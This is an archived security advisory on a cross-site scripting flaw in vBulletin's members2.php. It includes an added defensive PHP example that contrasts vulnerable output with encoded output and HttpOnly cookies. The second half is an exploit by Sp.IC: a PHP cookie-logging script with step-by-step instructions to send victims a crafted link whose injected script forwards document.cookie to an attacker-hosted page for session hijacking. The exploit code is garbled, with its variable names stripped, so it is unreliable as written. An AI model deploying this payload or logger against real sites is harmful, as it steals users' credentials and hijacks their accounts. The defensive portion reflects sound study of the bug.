source: http://www.securityfocus.com/bid/6246/info
Due to insufficient sanitization of user-supplied values, it is possible to exploit a vulnerability in vBulletin. By passing an invalid value to a variable located in 'members2.php', it is possible to generate an error page that includes attacker-supplied HTML code, which will then be executed in a legitimate user's browser.
This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software. The attacker may use those cookie-based credentials to hijack the legitimate user's session.
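The following PHP snippet is an added illustration of the bug class described above and is not vBulletin's code. It shows the pattern the advisory describes (a query value reflected verbatim into an error page, where a value beginning with `-->` escapes the surrounding HTML comment) next to a hardened version that validates the value as a small integer and HTML-encodes anything it echoes, plus an HttpOnly session cookie as a second layer that blunts cookie theft even when an encoding bug slips through. The function names, the `perpage` handling, the cookie name and the PHP 7.3+ `setcookie` options array are assumptions for the example, not vBulletin identifiers.

```php
<?php
// Added example (not vBulletin's code). Names below are assumptions.

// Vulnerable pattern: the raw query value is dropped straight into the
// error page, so a value that starts with --> closes the comment and the
// remainder is rendered as live markup.
function render_error_vulnerable(string $perpage): string
{
    return "<!-- debug: perpage=" . $perpage . " --><p>Invalid page size.</p>";
}

// Hardened pattern:
//  (1) reject anything that is not a small positive integer, and
//  (2) HTML-encode whatever is echoed back, so '<', '>', quotes and '&'
//      can no longer terminate the enclosing comment, tag or attribute.
function render_error_hardened(string $perpage): string
{
    if (!ctype_digit($perpage) || (int)$perpage < 1 || (int)$perpage > 100) {
        $safe = htmlspecialchars($perpage, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        return "<p>Invalid page size: <code>" . $safe . "</code></p>";
    }
    return ""; // valid value: no error page needed
}

// Defence in depth: a session cookie that document.cookie cannot read makes
// the advisory's cookie-logging payload return nothing useful.
// 'sessionid' is an assumed cookie name, not vBulletin's.
function set_session_cookie_hardened(string $sessionId): void
{
    setcookie('sessionid', $sessionId, [
        'httponly' => true,   // not exposed to script
        'secure'   => true,   // HTTPS only
        'samesite' => 'Lax',
        'path'     => '/',
    ]);
}

// Constructed sample input with the shape of the advisory's payload.
$payload = "--><script>location='http://[Exploit Path]?Action=Log&Cookie='+(document.cookie);</script>";

echo render_error_vulnerable($payload), "\n"; // <script> element survives intact
echo render_error_hardened($payload), "\n";   // shown as &lt;script&gt;... text only
```

Run it from the command line with `php example.php` and compare the two output lines: in the first the comment is closed and the script element is emitted as markup; in the second the same bytes come back as inert encoded text, which is exactly the property the vulnerable error page lacks.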
- Run this script on some host:
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC ([email protected]).
// Description: Fetching vBulletin's cookies and storing them in a log file.
// Variables:
= "Cookies.Log";
// Functions:
/*
If (['Action'] = "Log") {
    = "<!--";
    = "--->";
}
Else {
    = "";
    = "";
}
Print ();
*/
Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A Href=\"MailTo:[email protected]\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ();
*/
Switch (['Action']) {
    Case "Log":
        = ['Cookie'];
        = StrStr (, SubStr (, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));
        = FOpen (, "a+");
        FWrite (, Trim () . "\n");
        FClose ();
        Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . ['HTTP_REFERER'] . "\">");
        Break;
    Case "List":
        If (!File_Exists () || !In_Array ()) {
            Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
            Exit ();
        }
        Else {
            Print ("</Center></Pre>");
            = Array_UniQue (File ());
            Print ("<Pre>");
            Print ("<B>.:: Statics</B>\n");
            Print ("\n");
            Print ("^ Logged Records : <B>" . Count (File ()) . "</B>\n");
            Print ("^ Listed Records : <B>" . Count () . " </B>[Not Counting Duplicates]\n");
            Print ("\n");
            Print ("<B>.:: Options</B>\n");
            Print ("\n");
            If (Count (File ()) > 0) {
                ['Download'] = "[<A Href=\"" . . "\">Download</A>]";
            }
            Else {
                ['Download'] = "[No Records in Log]";
            }
            Print ("^ Download Log : " . ['Download'] . "\n");
            Print ("^ Clear Records : [<A Href=\"" . . "?Action=Delete\">Y</A>]\n");
            Print ("\n");
            Print ("<B>.:: Records</B>\n");
            Print ("\n");
            While (List ([0], [1]) = Each ()) {
                Print ("<B>" . [0] . ": </B>" . [1]);
            }
        }
        Print ("</Pre>");
        Break;
    Case "Delete":
        @UnLink ();
        Print ("<Br><Br><B>Deleted Successfully</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
        Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . ['HTTP_REFERER'] . "\">");
        Break;
}
?>
- Give a victim this link: member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]
- Note: You can replace [Script Code] with: --><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+(document.cookie);</Script>
- Then go to Http://[Exploit Path]?Action=List